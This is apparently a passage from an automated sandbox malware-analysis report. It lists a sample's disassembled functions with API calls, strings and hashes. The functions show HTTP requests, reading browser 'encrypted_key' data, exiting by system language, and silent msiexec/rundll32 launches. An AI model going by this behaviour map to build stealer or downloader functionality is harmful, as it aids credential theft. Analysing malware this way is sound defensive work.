ShellExecuteEx.SHELL32(0000003C), ref: 003534EA

Strings

/i ", xrefs: 003533E4
.msi, xrefs: 00353398
.dll, xrefs: 003531E5
<, xrefs: 00353490
"" , xrefs: 0035309A
/passive, xrefs: 0035345B
C:\Windows\system32\rundll32.exe, xrefs: 00353332
C:\Windows\system32\msiexec.exe, xrefs: 003534BF

Memory Dump Source

Source File: 00000000.00000002.1992251783.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1992232508.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000720000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.00000000007FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000082B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000839000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992935085.000000000083A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993049412.00000000009D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993067307.00000000009D3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID: ExecuteShell$lstrcpy
String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
API String ID: 2507796910-3625054190
Opcode ID: 88118e63ee69694df6d12174e4bbf5d94a8de95d844c6634136de41351c1ecc7
Instruction ID: 73736bfba19736b72ac644e659882f13e1e9abfd61435ea787e933adc3174d80
Opcode Fuzzy Hash: 88118e63ee69694df6d12174e4bbf5d94a8de95d844c6634136de41351c1ecc7
Instruction Fuzzy Hash: C912F1718005189ADB1AEBA0DC92FDEB778BF14301F504259F9067A1A1EF742B4EDF52

Function 003552C0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 139stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0035A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0035A7E6

Part of subcall function 00346280: InternetOpenA.WININET(00360DFE,00000001,00000000,00000000,00000000), ref: 003462E1
Part of subcall function 00346280: StrCmpCA.SHLWAPI(?,0127E768), ref: 00346303
Part of subcall function 00346280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00346335
Part of subcall function 00346280: HttpOpenRequestA.WININET(00000000,GET,?,0127DFF8,00000000,00000000,00400100,00000000), ref: 00346385
Part of subcall function 00346280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 003463BF
Part of subcall function 00346280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 003463D1

Part of subcall function 0035A8A0: lstrcpy.KERNEL32(?,00360E17), ref: 0035A905

StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00355318
lstrlen.KERNEL32(00000000), ref: 0035532F

Part of subcall function 00358E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00358E52

StrStrA.SHLWAPI(00000000,00000000), ref: 00355364
lstrlen.KERNEL32(00000000), ref: 00355383
lstrlen.KERNEL32(00000000), ref: 003553AE

Part of subcall function 0035A740: lstrcpy.KERNEL32(00360E17,00000000), ref: 0035A788

Strings

ERROR, xrefs: 003553B9
ERROR, xrefs: 0035530A
ERROR, xrefs: 003554A9
ERROR, xrefs: 00355432
ERROR, xrefs: 0035546F

Memory Dump Source

Source File: 00000000.00000002.1992251783.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1992232508.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000720000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.00000000007FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000082B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000839000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992935085.000000000083A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993049412.00000000009D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993067307.00000000009D3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
String ID: ERROR$ERROR$ERROR$ERROR$ERROR
API String ID: 3240024479-1526165396
Opcode ID: 01693cd377c929753f26085e5f60eabcfae4c0c82b3499397fac723a0bfc5bd0
Instruction ID: eb1d1f35fd2738828d348694760f76dbc563013e4d9b39bcc544b6faa6cee1fc
Opcode Fuzzy Hash: 01693cd377c929753f26085e5f60eabcfae4c0c82b3499397fac723a0bfc5bd0
Instruction Fuzzy Hash: 4B510C709105489BDB16FF60C996EED7B79AF10302F504118EC066E5A2EF346B4DEB62

Function 003512D0 Relevance: 16.8, APIs: 11, Instructions: 310COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1992251783.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1992232508.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000720000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.00000000007FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000082B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000839000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992935085.000000000083A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993049412.00000000009D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993067307.00000000009D3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID: lstrcpylstrlen
String ID:
API String ID: 2001356338-0
Opcode ID: a6e59c04ffeca6402d9ea48b0981c8cd9ce90affcbbe6079e230ecfa47535229
Instruction ID: 5fbb3642737192932db87e41694c53540ed78e21985de0ac040cc003eaf8742a
Opcode Fuzzy Hash: a6e59c04ffeca6402d9ea48b0981c8cd9ce90affcbbe6079e230ecfa47535229
Instruction Fuzzy Hash: 46C1D7B590020C9BCB15EF60DC89FEA7778BF64305F004599F90A6B161EF70AA89DF91

Function 00354280 Relevance: 16.7, APIs: 11, Instructions: 204stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00358DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00358E0B

lstrcat.KERNEL32(?,00000000), ref: 003542EC
lstrcat.KERNEL32(?,0127E4F0), ref: 0035430B
lstrcat.KERNEL32(?,?), ref: 0035431F
lstrcat.KERNEL32(?,0127CFD0), ref: 00354333

Part of subcall function 0035A740: lstrcpy.KERNEL32(00360E17,00000000), ref: 0035A788

Part of subcall function 00358D90: GetFileAttributesA.KERNEL32(00000000,?,00341B54,?,?,0036564C,?,?,00360E1F), ref: 00358D9F

Part of subcall function 00349CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00349D39

Part of subcall function 003499C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 003499EC
Part of subcall function 003499C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00349A11
Part of subcall function 003499C0: LocalAlloc.KERNEL32(00000040,?), ref: 00349A31
Part of subcall function 003499C0: ReadFile.KERNEL32(000000FF,?,00000000,0034148F,00000000), ref: 00349A5A
Part of subcall function 003499C0: LocalFree.KERNEL32(0034148F), ref: 00349A90
Part of subcall function 003499C0: CloseHandle.KERNEL32(000000FF), ref: 00349A9A

Part of subcall function 003593C0: GlobalAlloc.KERNEL32(00000000,003543DD,003543DD), ref: 003593D3

StrStrA.SHLWAPI(?,0127E3E8), ref: 003543F3
GlobalFree.KERNEL32(?), ref: 00354512

Part of subcall function 00349AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N4,00000000,00000000), ref: 00349AEF
Part of subcall function 00349AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00344EEE,00000000,?), ref: 00349B01
Part of subcall function 00349AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N4,00000000,00000000), ref: 00349B2A
Part of subcall function 00349AC0: LocalFree.KERNEL32(?,?,?,?,00344EEE,00000000,?), ref: 00349B3F

lstrcat.KERNEL32(?,00000000), ref: 003544A3
StrCmpCA.SHLWAPI(?,003608D1), ref: 003544C0
lstrcat.KERNEL32(00000000,00000000), ref: 003544D2
lstrcat.KERNEL32(00000000,?), ref: 003544E5
lstrcat.KERNEL32(00000000,00360FB8), ref: 003544F4

Memory Dump Source

Source File: 00000000.00000002.1992251783.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1992232508.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000720000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.00000000007FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000082B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000839000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992935085.000000000083A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993049412.00000000009D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993067307.00000000009D3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
String ID:
API String ID: 3541710228-0
Opcode ID: 7db43bd2dfdf5e041d9e072134357b0df2b671ec368b23d2c29861a08642c66d
Instruction ID: f06fbf5a90d074d430c69159a34b2cc7489f88f408e560cb83283aad854cff17
Opcode Fuzzy Hash: 7db43bd2dfdf5e041d9e072134357b0df2b671ec368b23d2c29861a08642c66d
Instruction Fuzzy Hash: DF716976900208ABDB15EBA0DC45FEE73B9AF58301F004599FA05AB191EB34DB4DDF61

Function 00356770 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

GetUserDefaultLangID.KERNEL32 ref: 00356774
ExitProcess.KERNEL32 ref: 003567A5
ExitProcess.KERNEL32 ref: 003567AF
ExitProcess.KERNEL32 ref: 003567B9
ExitProcess.KERNEL32 ref: 003567C3
ExitProcess.KERNEL32 ref: 003567CD

Strings

*, xrefs: 0035678C

Memory Dump Source

Source File: 00000000.00000002.1992251783.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1992232508.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000720000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.00000000007FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000082B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000839000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992935085.000000000083A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993049412.00000000009D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993067307.00000000009D3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID: ExitProcess$DefaultLangUser
String ID: *
API String ID: 1494266314-163128923
Opcode ID: 90daa86bfd4a1abf455c4747930d1c2de94fbacf8dc7b819c14524ac5a0f43f6
Instruction ID: 2bea2bfd7a1f48d8db2bb7f988324490962c7217e100ea1e5d945a96a06c4f70
Opcode Fuzzy Hash: 90daa86bfd4a1abf455c4747930d1c2de94fbacf8dc7b819c14524ac5a0f43f6
Instruction Fuzzy Hash: C4F05430904209EFE3449FE0E90972C7B74FB18703F04019AEA05D7290D6744B56BB96

Function 003592E0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(:5,80000000,00000003,00000000,00000003,00000080,00000000,?,00353AEE,?), ref: 003592FC
GetFileSizeEx.KERNEL32(000000FF,:5), ref: 00359319
CloseHandle.KERNEL32(000000FF), ref: 00359327

Strings

:5, xrefs: 003592F8, 003592FB
:5, xrefs: 00359311, 0035933D, 00359314

Memory Dump Source

Source File: 00000000.00000002.1992251783.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1992232508.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000720000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.00000000007FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000082B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000839000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992935085.000000000083A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993049412.00000000009D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993067307.00000000009D3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleSize
String ID: :5$:5
API String ID: 1378416451-989784648
Opcode ID: a14b1eae711fc9596eea1b310c534e8c94085783a0d89232bdd5d6586a38e479
Instruction ID: 7fb11afad48c1e78ad66bd5cc91ec50d5011fd5ea7ea1ab3ff5b630a82d2f361
Opcode Fuzzy Hash: a14b1eae711fc9596eea1b310c534e8c94085783a0d89232bdd5d6586a38e479
Instruction Fuzzy Hash: 07F08C38E00208FBEB10DBB0DC08F9E77B9EB58311F108255BA51A72D0E6709604AB40

Function 0035C84E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

memset.MSVCRT ref: 0035C8BF
___crtGetStringTypeA.LIBCMT ref: 0035C8EC
___crtLCMapStringA.LIBCMT ref: 0035C90C
___crtLCMapStringA.LIBCMT ref: 0035C931

Strings

, xrefs: 0035C896

Memory Dump Source

Source File: 00000000.00000002.1992251783.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1992232508.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000720000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.00000000007FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000082B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000839000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992935085.000000000083A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993049412.00000000009D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993067307.00000000009D3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID: String___crt$Typememset
String ID:
API String ID: 3530896902-3916222277
Opcode ID: a5a73afa51f336b434c1aeafadef72a857705681f413c2e077664030153ba7e7
Instruction ID: ab3eacadec6d7248c67f360076e25d63cbc01cce7524f864394df1896f32ab44
Opcode Fuzzy Hash: a5a73afa51f336b434c1aeafadef72a857705681f413c2e077664030153ba7e7
Instruction Fuzzy Hash: AF41E5B151079C5EDB228B24CC94FFBBBFC9B45709F1454E8ED8A86192D3719A48CF60

Function 00352C90 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 99COMMON

Download Yara Rule

APIs

Part of subcall function 0035A740: lstrcpy.KERNEL32(00360E17,00000000), ref: 0035A788

